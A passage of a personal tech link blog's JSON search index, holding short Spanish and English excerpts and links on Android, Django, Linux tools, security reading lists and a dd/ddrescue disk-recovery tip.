2008, en una época en la que los reyes del sector eran Symbian y BlackBerry.\n» El Androide Libre | elandroidelibre.elespanol.com\n","permalink":"http://karpoke.ignaciocano.com/2018/09/24/10-anos-de-android-asi-ha-evolucionado-el-mejor-sistema-movil/","summary":"\u003cblockquote\u003e\n\u003cp\u003eEl día 23 de septiembre de 2008 es una fecha marcada para Google en el\ncalendario, ese día se presentó al público la versión 1.0 de Android. Un\nsistema que, aunque parece llevar con nosotros desde siempre, cumple hoy\ndiez años. Nada más y nada menos. Aunque su desarrollo empezó varios años\nantes de 2008, en una época en la que los reyes del sector eran Symbian y\nBlackBerry.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» El Androide Libre | \u003ca href=\"https://elandroidelibre.elespanol.com/2018/09/android-decimo-aniversario.html\"\u003eelandroidelibre.elespanol.com\u003c/a\u003e\u003c/p\u003e","title":"10 años de Android: así ha evolucionado el mejor sistema móvil"},{"content":" Django developers, we\u0026rsquo;re devoting this month\u0026rsquo;s Python column to packages that will help you. These are our favorite Django libraries for saving time, cutting down on boilerplate code, and generally simplifying our lives. We\u0026rsquo;ve got six packages for Django apps and two for Django\u0026rsquo;s REST Framework, and we\u0026rsquo;re not kidding when we say these packages show up in almost every project we work on.\n» Opensource.com | opensource.com\n","permalink":"http://karpoke.ignaciocano.com/2018/09/21/8-python-packages-that-will-simplify-your-life-with-django/","summary":"\u003cblockquote\u003e\n\u003cp\u003eDjango developers, we\u0026rsquo;re devoting this month\u0026rsquo;s Python column to packages\nthat will help you. These are our favorite Django libraries for saving time,\ncutting down on boilerplate code, and generally simplifying our lives. We\u0026rsquo;ve\ngot six packages for Django apps and two for Django\u0026rsquo;s REST Framework, and\nwe\u0026rsquo;re not kidding when we say these packages show up in almost every project\nwe work on.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Opensource.com | \u003ca href=\"https://opensource.com/article/18/9/django-packages\"\u003eopensource.com\u003c/a\u003e\u003c/p\u003e","title":"8 Python packages that will simplify your life with Django"},{"content":" I’ve been writing code for 20 years. During that time I’ve worked with 17 teams coding different languages to build hundreds of projects. These include everything from a simple blog site, to APIs supporting 3,000 requests/second, to top selling apps. From these experiences, combined with the books I’ve read, it’s become apparent to me what matters most in code: readability.\n» Jason McCreary | jason.pureconcepts.net\n","permalink":"http://karpoke.ignaciocano.com/2018/09/19/10-practices-for-readable-code/","summary":"\u003cblockquote\u003e\n\u003cp\u003eI’ve been writing code for 20 years. During that time I’ve worked with 17\nteams coding different languages to build hundreds of projects. These\ninclude everything from a simple blog site, to APIs supporting 3,000\nrequests/second, to top selling apps. From these experiences, combined with\nthe books I’ve read, it’s become apparent to me what matters most in code:\nreadability.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Jason McCreary | \u003ca href=\"http://jason.pureconcepts.net/2018/09/practices-write-readable-code-less-complex/\"\u003ejason.pureconcepts.net\u003c/a\u003e\u003c/p\u003e","title":"10 practices for readable code"},{"content":" Isn’t monitoring just monitoring? Doesn’t it include logging, visualization, and time-series data? The terminology around monitoring has caused a lot of confusion over the years and has led to some poor tools that tout the ability to do everything in one format. Observability proponents recognize there are many levels for observing a system. Metrics aggregation is primarily time-series data, and that’s what we’ll discuss in this article.\n» Opensource.com | opensource.com\n","permalink":"http://karpoke.ignaciocano.com/2018/08/30/4-open-source-monitoring-tools/","summary":"\u003cblockquote\u003e\n\u003cp\u003eIsn’t monitoring just monitoring? Doesn’t it include logging, visualization,\nand time-series data? The terminology around monitoring has caused a lot of\nconfusion over the years and has led to some poor tools that tout the\nability to do everything in one format. Observability proponents recognize\nthere are many levels for observing a system. Metrics aggregation is\nprimarily time-series data, and that’s what we’ll discuss in this article.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Opensource.com | \u003ca href=\"https://opensource.com/article/18/8/open-source-monitoring-tools\"\u003eopensource.com\u003c/a\u003e\u003c/p\u003e","title":"4 open source monitoring tools"},{"content":" New to lightweight and systemd free Alpine Linux and package management? Try my simple guide that explains how to install, remove, query and manage packages on an Alpine Linux.\n» nixCraft: Linux Tips, Hacks, Tutorials, And Ideas In Blog Format | cyberciti.biz\n","permalink":"http://karpoke.ignaciocano.com/2018/08/27/10-alpine-linux-apk-command-examples/","summary":"\u003cblockquote\u003e\n\u003cp\u003eNew to lightweight and systemd free Alpine Linux and package management? Try\nmy simple guide that explains how to install, remove, query and manage\npackages on an Alpine Linux.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» nixCraft: Linux Tips, Hacks, Tutorials, And Ideas In Blog Format | \u003ca href=\"https://www.cyberciti.biz/faq/10-alpine-linux-apk-command-examples/\"\u003ecyberciti.biz\u003c/a\u003e\u003c/p\u003e","title":"10 Alpine Linux apk Command Examples"},{"content":" As containers become an almost ubiquitous method of packaging and deploying applications, the instances of malware have increased. Securing containers is now a top priority for DevOps engineers. Fortunately, a number of open source programs are available that scan containers and container images. Let’s look at five such tools. Anchore, Clair, Dagda, OpenSCAP and Sysdig Falco.\n» Opensource.com | opensource.com\n","permalink":"http://karpoke.ignaciocano.com/2018/08/23/5-open-source-tools-for-container-security/","summary":"\u003cblockquote\u003e\n\u003cp\u003eAs containers become an almost ubiquitous method of packaging and deploying\napplications, the instances of malware have increased. Securing containers\nis now a top priority for DevOps engineers. Fortunately, a number of open\nsource programs are available that scan containers and container images.\nLet’s look at five such tools. Anchore, Clair, Dagda, OpenSCAP and Sysdig\nFalco.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Opensource.com | \u003ca href=\"https://opensource.com/article/18/8/tools-container-security\"\u003eopensource.com\u003c/a\u003e\u003c/p\u003e","title":"5 open source tools for container security"},{"content":" In the first part of this three-part series using a Raspberry Pi for network-attached storage (NAS), we covered the fundamentals of the NAS setup, attached two 1TB hard drives (one for data and one for backups), and mounted the data drive on a remote device via the network filesystem (NFS). In part two, we will look at automating backups. Automated backups allow you to continually secure your data and recover from a hardware defect or accidental file removal.\n» Opensource.com | opensource.com\n","permalink":"http://karpoke.ignaciocano.com/2018/08/15/automating-backups-on-a-raspberry-pi-nas/","summary":"\u003cblockquote\u003e\n\u003cp\u003eIn the first part of this three-part series using a Raspberry Pi for\nnetwork-attached storage (NAS), we covered the fundamentals of the NAS setup,\nattached two 1TB hard drives (one for data and one for backups), and mounted\nthe data drive on a remote device via the network filesystem (NFS). In part\ntwo, we will look at automating backups. Automated backups allow you to\ncontinually secure your data and recover from a hardware defect or accidental\nfile removal.\u003c/p\u003e","title":"Automating backups on a Raspberry Pi NAS"},{"content":" The best news app templates organise news into a few broad categories, allow users to save news stories they want to read later in a favourites list, and have a powerful search feature that helps them find relevant news stories quickly and easily. Whether you’re interested in building a news app from posts on your own website, creating an app for a localised news source, or pulling together all mll major news sources into one handy app, you’re sure to find a template that’s right for you from among these ten best Android news app templates available at CodeCanyon.\n» Nettuts+ | code.tutsplus.com\n","permalink":"http://karpoke.ignaciocano.com/2018/08/14/10-best-android-news-app-templates/","summary":"\u003cblockquote\u003e\n\u003cp\u003eThe best news app templates organise news into a few broad categories, allow\nusers to save news stories they want to read later in a favourites list, and\nhave a powerful search feature that helps them find relevant news stories\nquickly and easily. Whether you’re interested in building a news app from\nposts on your own website, creating an app for a localised news source, or\npulling together all mll major news sources into one handy app, you’re sure\nto find a template that’s right for you from among these ten best Android\nnews app templates available at CodeCanyon.\u003c/p\u003e","title":"10 Best Android News App Templates"},{"content":" With online streaming becoming popular by the day, there has been a rise in the portals and apps that allow you to stream content in a hassle-free manner. Now, to watch the content from different sources, you would need a centralized media player and this is where Kodi comes into the picture.\n» Fossbytes | fossbytes.com\n","permalink":"http://karpoke.ignaciocano.com/2018/08/09/10-best-kodi-repositories-for-downloading-popular-addons-2019-list/","summary":"\u003cblockquote\u003e\n\u003cp\u003eWith online streaming becoming popular by the day, there has been a rise in\nthe portals and apps that allow you to stream content in a hassle-free\nmanner. Now, to watch the content from different sources, you would need a\ncentralized media player and this is where Kodi comes into the picture.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Fossbytes | \u003ca href=\"https://fossbytes.com/10-best-kodi-repositories-2019-list/\"\u003efossbytes.com\u003c/a\u003e\u003c/p\u003e","title":"10 Best Kodi Repositories For Downloading Popular Addons | 2019 List"},{"content":" Hablar de Google es mencionar a una multinacional sin precedentes en el mundo de la tecnología. Los avances de esta compañía estadounidense a lo largo de los años han sido increíbles, pero no todo lo que esta empresa hace sale a la luz pública de forma sencilla. Por esta razón, hoy hemos querido recopilar 10 curiosidades de Google que seguro no conoces o nunca escuchaste.\n» Wwwhat\u0026rsquo;s new? | wwwhatsnew.com\n","permalink":"http://karpoke.ignaciocano.com/2018/08/06/10-cosas-de-google-que-aun-no-conoces/","summary":"\u003cblockquote\u003e\n\u003cp\u003eHablar de Google es mencionar a una multinacional sin precedentes en el\nmundo de la tecnología. Los avances de esta compañía estadounidense a lo\nlargo de los años han sido increíbles, pero no todo lo que esta empresa hace\nsale a la luz pública de forma sencilla. Por esta razón, hoy hemos querido\nrecopilar 10 curiosidades de Google que seguro no conoces o nunca\nescuchaste.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Wwwhat\u0026rsquo;s new? | \u003ca href=\"https://wwwhatsnew.com/2018/08/05/10-cosas-de-google-que-aun-no-conoces/\"\u003ewwwhatsnew.com\u003c/a\u003e\u003c/p\u003e","title":"10 cosas de Google que aún no conoces"},{"content":" Tal y como hiciéramos en las navidades pasadas, vamos a recomendar unos cuantos libros para que el estío se nos haga más soportable. Abundan las calores y nada mejor que un librazo y algo fresco que echarse al coleto para aguantar las terribles temperaturas que nos quedan por soportar. En HISPASEC nos gustan los libros, mucho, y cuando salimos de vacaciones asaltamos la biblioteca de empresa y sacamos varios volúmenes (algunos incunables) prestados, para devolverlos sanos y salvos (aunque con algo de salitre y tufillo a carbón de chiringuito) de vuelta a la estantería cuando comienza el nuevo curso escolar.\n» una-al-dia Hispasec | unaaldia.hispasec.com\n","permalink":"http://karpoke.ignaciocano.com/2018/07/23/10-libros-de-seguridad-informatica-para-leer-este-verano/","summary":"\u003cblockquote\u003e\n\u003cp\u003eTal y como hiciéramos en las navidades pasadas, vamos a recomendar unos\ncuantos libros para que el estío se nos haga más soportable. Abundan las\ncalores y nada mejor que un librazo y algo fresco que echarse al coleto para\naguantar las terribles temperaturas que nos quedan por soportar. En HISPASEC\nnos gustan los libros, mucho, y cuando salimos de vacaciones asaltamos la\nbiblioteca de empresa y sacamos varios volúmenes (algunos incunables)\nprestados, para devolverlos sanos y salvos (aunque con algo de salitre y\ntufillo a carbón de chiringuito) de vuelta a la estantería cuando comienza\nel nuevo curso escolar.\u003c/p\u003e","title":"10 libros de seguridad informática para leer este verano"},{"content":" Administering networks and systems can get very stressful when the workload \u0026lt; piles up. Nobody really appreciates how long anything takes, and everyone wants their specific thing done yesterday. So it\u0026rsquo;s no wonder so many of us are drawn to the open source spirit of figuring out what works and sharing it with everyone.\n» Opensource.com | opensource.com\n","permalink":"http://karpoke.ignaciocano.com/2018/07/04/10-killer-tools-for-the-admin-in-a-hurry/","summary":"\u003cblockquote\u003e\n\u003cp\u003eAdministering networks and systems can get very stressful when the workload\n\u0026lt; piles up. Nobody really appreciates how long anything takes, and everyone\nwants their specific thing done yesterday. So it\u0026rsquo;s no wonder so many of us\nare drawn to the open source spirit of figuring out what works and sharing\nit with everyone.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Opensource.com | \u003ca href=\"https://opensource.com/article/18/7/tools-admin\"\u003eopensource.com\u003c/a\u003e\u003c/p\u003e","title":"10 killer tools for the admin in a hurry"},{"content":" Writing secure code is hard. When you learn a language, a module or a framework, you learn how it supposed to be used. When thinking about security, you need to think about how it can be misused. Python is no exception, even within thestandard library there are documented bad practices for writing hardened applications. Yet, when I’ve spoken to many Python developers they simply aren’t aware of them.\n» Hacker Noon | hackernoon.com\n","permalink":"http://karpoke.ignaciocano.com/2018/06/19/10-common-security-gotchas-in-python-and-how-to-avoid-them/","summary":"\u003cblockquote\u003e\n\u003cp\u003eWriting secure code is hard. When you learn a language, a module or a\nframework, you learn how it supposed to be used. When thinking about\nsecurity, you need to think about how it can be misused. Python is no\nexception, even within thestandard library there are documented bad\npractices for writing hardened applications. Yet, when I’ve spoken to many\nPython developers they simply aren’t aware of them.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Hacker Noon | \u003ca href=\"https://hackernoon.com/10-common-security-gotchas-in-python-and-how-to-avoid-them-e19fbe265e03\"\u003ehackernoon.com\u003c/a\u003e\u003c/p\u003e","title":"10 common security gotchas in Python and how to avoid them"},{"content":" 7-Zip is a free open source, cross-platform, powerful, and fully-featured file archiver with a high compression ratio, for Windows. It has a powerful command line version that has been ported to Linux/POSIX systems.\n» Tecmint: Linux Howtos, Tutorials \u0026amp; Guides | tecmint.com\n","permalink":"http://karpoke.ignaciocano.com/2018/05/31/10-7zip-file-archive-command-examples-in-linux/","summary":"\u003cblockquote\u003e\n\u003cp\u003e7-Zip is a free open source, cross-platform, powerful, and fully-featured\nfile archiver with a high compression ratio, for Windows. It has a powerful\ncommand line version that has been ported to Linux/POSIX systems.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Tecmint: Linux Howtos, Tutorials \u0026amp; Guides | \u003ca href=\"https://www.tecmint.com/7zip-command-examples-in-linux/\"\u003etecmint.com\u003c/a\u003e\u003c/p\u003e","title":"10 7zip (File Archive) Command Examples in Linux"},{"content":" Sometimes the right tool for the job is a command-line application. A command-line application is a program that you interact with and run from something like your shell or Terminal. Git and Curl are examples of command-line applications that you might already be familiar with.\n» Opensource.com | opensource.com\n","permalink":"http://karpoke.ignaciocano.com/2018/05/31/3-python-command-line-tools/","summary":"\u003cblockquote\u003e\n\u003cp\u003eSometimes the right tool for the job is a command-line application. A\ncommand-line application is a program that you interact with and run from\nsomething like your shell or Terminal. Git and Curl are examples of\ncommand-line applications that you might already be familiar with.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Opensource.com | \u003ca href=\"https://opensource.com/article/18/5/3-python-command-line-tools\"\u003eopensource.com\u003c/a\u003e\u003c/p\u003e","title":"3 Python command-line tools"},{"content":" En el siguiente artículo vamos a echar un vistazo a You-Get. Se trata de un programa de CLI escrito en Python. Nos va a permitir permite descargar imágenes, audio y vídeos de algunos sitios web populares como son Youtube, Facebook, Twitter, Vimeo y mucho más. Actualmente tiene unos 80 sitios web compatibles.\n» Ubunlog | ubunlog.com\n","permalink":"http://karpoke.ignaciocano.com/2018/05/20/you-get-descarga-contenido-multimedia-utilizando-la-terminal/","summary":"\u003cblockquote\u003e\n\u003cp\u003eEn el siguiente artículo vamos a echar un vistazo a You-Get. Se trata de un\nprograma de CLI escrito en Python. Nos va a permitir permite descargar\nimágenes, audio y vídeos de algunos sitios web populares como son Youtube,\nFacebook, Twitter, Vimeo y mucho más. Actualmente tiene unos 80 sitios web\ncompatibles.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Ubunlog | \u003ca href=\"https://ubunlog.com/you-get-descarga-contenido-multimedia/\"\u003eubunlog.com\u003c/a\u003e\u003c/p\u003e","title":"You-Get, descarga contenido multimedia utilizando la terminal"},{"content":" En las últimas décadas la palabra hacker ha sido automáticamente asociada con los ordenadores personales, sin embargo, la historia nos dice que el hacking como práctica precede por mucho al inolvidable IBM PC. Tarjetas perforadas, teléfonos y telégrafos fueron los blancos favoritos de expertos y entusiastas por igual, enfocados en demostrar las debilidades de esos sistemas, obtener un par de dólares extra, y en casos más críticos, salvar vidas. Hoy vamos a nombrar a algunos de ellos.\n» NeoTeo | neoteo.com\n","permalink":"http://karpoke.ignaciocano.com/2018/05/17/12-hackers-que-preceden-la-invencion-del-ordenador-personal/","summary":"\u003cblockquote\u003e\n\u003cp\u003eEn las últimas décadas la palabra hacker ha sido automáticamente asociada con\nlos ordenadores personales, sin embargo, la historia nos dice que el hacking\ncomo práctica precede por mucho al inolvidable IBM PC. Tarjetas perforadas,\nteléfonos y telégrafos fueron los blancos favoritos de expertos y entusiastas\npor igual, enfocados en demostrar las debilidades de esos sistemas, obtener\nun par de dólares extra, y en casos más críticos, salvar vidas. Hoy vamos a\nnombrar a algunos de ellos.\u003c/p\u003e","title":"12 hackers que preceden la invención del ordenador personal"},{"content":" En el día a día del administrador de sistemas o del cada vez más popular DevOps, utilizar la terminal es algo que consume gran parte de nuestro tiempo, ya sea realizando tareas normales, tareas de automatización o durante procesos de configuración de sistemas. Pasamos gran parte de nuestro tiempo delante de una terminal y debemos aprender los comandos más interesantes que nos ayuden a realizar las tareas más rápida y cómodamente.\n» Emezeta blog | emezeta.com\n","permalink":"http://karpoke.ignaciocano.com/2018/05/14/10-comandos-de-terminal-que-quizas-no-conocias/","summary":"\u003cblockquote\u003e\n\u003cp\u003eEn el día a día del administrador de sistemas o del cada vez más popular\nDevOps, utilizar la terminal es algo que consume gran parte de nuestro\ntiempo, ya sea realizando tareas normales, tareas de automatización o\ndurante procesos de configuración de sistemas. Pasamos gran parte de nuestro\ntiempo delante de una terminal y debemos aprender los comandos más\ninteresantes que nos ayuden a realizar las tareas más rápida y cómodamente.\u003c/p\u003e","title":"10 comandos de terminal que quizás no conocías"},{"content":" What does tech management at Slack, HubSpot, Netflix, Etsy, Shopify, InVision, and more have in common? A lot, apparently! When we launched our first SoapBox hero I was surprised to discover a document used to introduce her working style to her team. I had never seen that before and it was awesome! Did others have these? I needed to know. Eventually, I found a treasure trove of examples by Engineering Leaders from companies with some of the best culture in tech.\n» Hacker Noon | hackernoon.com\n","permalink":"http://karpoke.ignaciocano.com/2018/05/03/12-manager-readmes-from-silicon-valley-s-top-tech-companies/","summary":"\u003cblockquote\u003e\n\u003cp\u003eWhat does tech management at Slack, HubSpot, Netflix, Etsy, Shopify,\nInVision, and more have in common? A lot, apparently! When we launched our\nfirst SoapBox hero I was surprised to discover a document used to introduce\nher working style to her team. I had never seen that before and it was\nawesome! Did others have these? I needed to know. Eventually, I found a\ntreasure trove of examples by Engineering Leaders from companies with some of\nthe best culture in tech.\u003c/p\u003e","title":"12 “Manager READMEs” from Silicon Valley’s Top Tech Companies"},{"content":" The much-awaited makeover of Gmail web interface is here after five long years. Google has not only redesigned the look but also added several new functionalities. However, you will get to the see the new features only if you opt-in for the new Gmail layout. While there are a bunch of features that are neat but many of them are minor ones. So let’s take a look at the ones that are actually useful.\n» Fossbytes | fossbytes.com\n","permalink":"http://karpoke.ignaciocano.com/2018/04/30/10-biggest-features-of-new-gmail-for-web-you-need-to-use/","summary":"\u003cblockquote\u003e\n\u003cp\u003eThe much-awaited makeover of Gmail web interface is here after five long\nyears. Google has not only redesigned the look but also added several new\nfunctionalities. However, you will get to the see the new features only if\nyou opt-in for the new Gmail layout. While there are a bunch of features\nthat are neat but many of them are minor ones. So let’s take a look at the\nones that are actually useful.\u003c/p\u003e","title":"10 Biggest Features Of New Gmail For Web You Need To Use"},{"content":" Mucho más tarde se inventó el algoritmo, el cálculo numérico, la regla de cálculo, la máquina de calcular, la tarjeta perforada o la primera calculadora automática que se fabricó y empleó a escala industrial. En 1936 llegó la revolución cuando el matemático Alan Turing -considerado con justicia el \u0026ldquo;padre de la ciencia de la computación\u0026rdquo;- formalizó los conceptos de algoritmo y de máquina de Turing.\n» Foro de elhacker.net - Noticias | foro.elhacker.net\n","permalink":"http://karpoke.ignaciocano.com/2018/04/20/10-computadoras-clasicas-que-hicieron-historia/","summary":"\u003cblockquote\u003e\n\u003cp\u003eMucho más tarde se inventó el algoritmo, el cálculo numérico, la regla de\ncálculo, la máquina de calcular, la tarjeta perforada o la primera\ncalculadora automática que se fabricó y empleó a escala industrial. En 1936\nllegó la revolución cuando el matemático Alan Turing -considerado con\njusticia el \u0026ldquo;padre de la ciencia de la computación\u0026rdquo;- formalizó los conceptos\nde algoritmo y de máquina de Turing.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Foro de elhacker.net - Noticias | \u003ca href=\"https://foro.elhacker.net/noticias/10_computadoras_clasicas_que_hicieron_historia-t482814.0.html;msg2160532#msg2160532\"\u003eforo.elhacker.net\u003c/a\u003e\u003c/p\u003e","title":"10 computadoras clásicas que hicieron historia"},{"content":" In a previous post, I put together a list of 10 questions for DevOps team managers to use as a point of reference when interviewing potential DevOps engineers. Each question included an in-depth explanation and follow-up questions, so in case you were, or are now, a candidate, that list could help you prepare for interviews.\n» Logz.io | logz.io\n","permalink":"http://karpoke.ignaciocano.com/2018/04/05/10-devops-interview-answers/","summary":"\u003cblockquote\u003e\n\u003cp\u003eIn a previous post, I put together a list of 10 questions for DevOps team\nmanagers to use as a point of reference when interviewing potential DevOps\nengineers. Each question included an in-depth explanation and follow-up\nquestions, so in case you were, or are now, a candidate, that list could\nhelp you prepare for interviews.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Logz.io | \u003ca href=\"https://logz.io/blog/community/10-devops-interview-answers/\"\u003elogz.io\u003c/a\u003e\u003c/p\u003e","title":"10 DevOps Interview Answers"},{"content":" Cloudflare** ha anunciado un nuevo servicio de **DNS gratuito bajo los IPs 1.1.1.1 y 1.0.0.1 con dos objetivos: acelerar la conexión de internet y proteger la privacidad de cualquier persona que lo use.\n» ALT1040 | hipertextual.com\n","permalink":"http://karpoke.ignaciocano.com/2018/04/02/1-1-1-1-servicio-dns-que-acelera-tu-internet-y-valora-tu-privacidad/","summary":"\u003cblockquote\u003e\n\u003cp\u003eCloudflare** ha anunciado un nuevo servicio de **DNS gratuito bajo los IPs\n1.1.1.1 y 1.0.0.1 con dos objetivos: acelerar la conexión de internet y\nproteger la privacidad de cualquier persona que lo use.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» ALT1040 | \u003ca href=\"https://hipertextual.com/2018/04/1-1-1-1-dns\"\u003ehipertextual.com\u003c/a\u003e\u003c/p\u003e","title":"1.1.1.1: servicio DNS que acelera tu internet y valora tu privacidad"},{"content":" Pero ahora lo acompañaba un hombre más joven, con una vestimenta más tradicional, gruesas gafas y una expresión austera. Aunque no tan famoso, era muy conocido, particularmente en los círculos académicos por haber \u0026ldquo;sacudido los fundamentos de nuestra entendimiento (…) de la mente humana\u0026rdquo;, según declaró la Universidad de Princeton al otorgarle un doctorado honorario. El acompañante de Einstein era el matemático austríaco Kurt Gödel, a menudo descrito como el más grande filósofo lógico desde Aristóteles.\n» BBC Mundo | bbc.com\n","permalink":"http://karpoke.ignaciocano.com/2018/04/02/quien-era-kurt-godel-el-hombre-que-caminaba-con-albert-einstein-y-al-que-comparan-con-aristoteles/","summary":"\u003cblockquote\u003e\n\u003cp\u003ePero ahora lo acompañaba un hombre más joven, con una vestimenta más\ntradicional, gruesas gafas y una expresión austera. Aunque no tan famoso,\nera muy conocido, particularmente en los círculos académicos por haber\n\u0026ldquo;sacudido los fundamentos de nuestra entendimiento (…) de la mente humana\u0026rdquo;,\nsegún declaró la Universidad de Princeton al otorgarle un doctorado\nhonorario. El acompañante de Einstein era el matemático austríaco Kurt\nGödel, a menudo descrito como el más grande filósofo lógico desde\nAristóteles.\u003c/p\u003e","title":"Quién era Kurt Gödel, el hombre que caminaba con Albert Einstein (y al que comparan con Aristóteles)"},{"content":" Designing a responsive layout doesn’t need to be difficult. Especially if you initially wireframe to plan ahead and figure out exactly what you’re creating. One of the hardest parts of a good responsive site is the navigation. This can take a while to figure out and there are plenty of tutorials to help with that. But I’m also a fan of using code snippets like the ones I’ve collected for this article.\n» Speckyboy Design Magazine | speckyboy.com\n","permalink":"http://karpoke.ignaciocano.com/2018/03/28/10-pure-css-responsive-navigation-code-snippets/","summary":"\u003cblockquote\u003e\n\u003cp\u003eDesigning a responsive layout doesn’t need to be difficult. Especially if you\ninitially wireframe to plan ahead and figure out exactly what you’re\ncreating. One of the hardest parts of a good responsive site is the\nnavigation. This can take a while to figure out and there are plenty of\ntutorials to help with that. But I’m also a fan of using code snippets like\nthe ones I’ve collected for this article.\u003c/p\u003e","title":"10 Pure CSS Responsive Navigation Code Snippets"},{"content":" In this article, we will learn how to gain control over our victim’s PC through mysql service via port 3306. There are various ways to do it and let take time and learn all those because different circumstances call for different measure. Medusa Medusa is intended to be a speedy, massively parallel, modular, login brute-forcer. It supports many protocols: AFP, CVS, FTP, HTTP, IMAP, rlogin, SSH, S\n» Hacking Articles | hackingarticles.in\n","permalink":"http://karpoke.ignaciocano.com/2018/03/08/5-ways-to-hack-mysql-login-password/","summary":"\u003cblockquote\u003e\n\u003cp\u003eIn this article, we will learn how to gain control over our victim’s PC\nthrough mysql service via port 3306. There are various ways to do it and let\ntake time and learn all those because different circumstances call for\ndifferent measure. Medusa Medusa is intended to be a speedy, massively\nparallel, modular, login brute-forcer. It supports many protocols: AFP, CVS,\nFTP, HTTP, IMAP, rlogin, SSH, S\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Hacking Articles | \u003ca href=\"http://www.hackingarticles.in/5-ways-to-hack-mysql-login-password/\"\u003ehackingarticles.in\u003c/a\u003e\u003c/p\u003e","title":"5 Ways to Hack MySQL Login Password"},{"content":" Mobile phones enable us to do almost everything online—from any place and at any time. As mobile activities are soaring, and digital activities are thriving, hackers aren’t long ways behind. In case you’re making an app or already have an app in the market, it’s essential to secure your application, your information, and your user’s information. Here’s why?\n» Open Source For You | opensourceforu.com\n","permalink":"http://karpoke.ignaciocano.com/2018/02/23/10-best-practices-to-follow-for-android-application-security/","summary":"\u003cblockquote\u003e\n\u003cp\u003eMobile phones enable us to do almost everything online—from any place and at\nany time. As mobile activities are soaring, and digital activities are\nthriving, hackers aren’t long ways behind. In case you’re making an app or\nalready have an app in the market, it’s essential to secure your\napplication, your information, and your user’s information. Here’s why?\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Open Source For You | \u003ca href=\"http://opensourceforu.com/2018/02/10-best-practices-follow-android-application-security/\"\u003eopensourceforu.com\u003c/a\u003e\u003c/p\u003e","title":"10 Best Practices to Follow for Android Application Security"},{"content":"Un par de comandos útiles para recuperar datos de un disco problemático.\nPara copiar el disco, mostrando una barra de progeso:\ndd if=/dev/sda | pv | dd of=/dev/sdb conv=noerror,sync Lanzamos ddrescue:\nddrescue -d -r3 /dev/sda /dev/sdb output.log ","permalink":"http://karpoke.ignaciocano.com/2018/01/30/recuperar-un-disco-corrupto/","summary":"\u003cp\u003eUn par de comandos útiles para recuperar datos de un disco problemático.\u003c/p\u003e\n\u003cp\u003ePara copiar el disco, mostrando una barra de progeso:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003edd if=/dev/sda | pv | dd of=/dev/sdb conv=noerror,sync\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eLanzamos \u003ccode\u003eddrescue\u003c/code\u003e:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003eddrescue -d -r3 /dev/sda /dev/sdb output.log\n\u003c/code\u003e\u003c/pre\u003e","title":"Recuperar un disco corrupto"},{"content":" Se trata de uno de los softwares más utilizados por usuarios y profesionales para conocer, sobre todo, las conexiones activas existentes en un equipo. Posee licencia GNU y se puede adquirir de forma totalmente gratuita. Está desarrollado utilizando varios lenguajes, como C, Java o incluso Python.\n» RedesZone | redeszone.net\n","permalink":"http://karpoke.ignaciocano.com/2018/01/25/10-alternativas-al-software-nmap-disponibles-para-linux-y-otros-sistemas-operativos/","summary":"\u003cblockquote\u003e\n\u003cp\u003eSe trata de uno de los softwares más utilizados por usuarios y profesionales\npara conocer, sobre todo, las conexiones activas existentes en un equipo.\nPosee licencia GNU y se puede adquirir de forma totalmente gratuita. Está\ndesarrollado utilizando varios lenguajes, como C, Java o incluso Python.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» RedesZone | \u003ca href=\"https://www.redeszone.net/2018/01/24/10-alternativas-al-software-nmap-disponibles-linux-otros-sistemas-operativos/\"\u003eredeszone.net\u003c/a\u003e\u003c/p\u003e","title":"10 alternativas al software Nmap disponibles para Linux y otros sistemas operativos"},{"content":" As explained in part one, I recently presented a talk at the AWS Community Day in Bangalore. The tweet following the talk became my most popular tweet ever and I received quite a few requests for more details. This is part two of the blog post. Hope you enjoy as-well! Please do not hesitate to give feedback, share your own stories or simply like :)\n» Hacker Noon | hackernoon.com\n","permalink":"http://karpoke.ignaciocano.com/2018/01/16/10-lessons-from-10-years-of-aws-part-2/","summary":"\u003cblockquote\u003e\n\u003cp\u003eAs explained in part one, I recently presented a talk at the AWS Community\nDay in Bangalore. The tweet following the talk became my most popular tweet\never and I received quite a few requests for more details. This is part two\nof the blog post. Hope you enjoy as-well! Please do not hesitate to give\nfeedback, share your own stories or simply like :)\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Hacker Noon | \u003ca href=\"https://hackernoon.com/10-lessons-from-10-years-of-aws-part-2-5dd92b533870\"\u003ehackernoon.com\u003c/a\u003e\u003c/p\u003e","title":"10 Lessons from 10 Years of AWS (part 2)"},{"content":" With the following tools, you can build powerful, interactive, user-friendly UNIX/Linux bash shell scripts.\n» nixCraft: Linux Tips, Hacks, Tutorials, And Ideas In Blog Format | cyberciti.biz\n","permalink":"http://karpoke.ignaciocano.com/2018/01/14/10-tools-to-add-some-spice-to-your-unix-linux-shell-scripts/","summary":"\u003cblockquote\u003e\n\u003cp\u003eWith the following tools, you can build powerful, interactive, user-friendly\nUNIX/Linux bash shell scripts.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» nixCraft: Linux Tips, Hacks, Tutorials, And Ideas In Blog Format | \u003ca 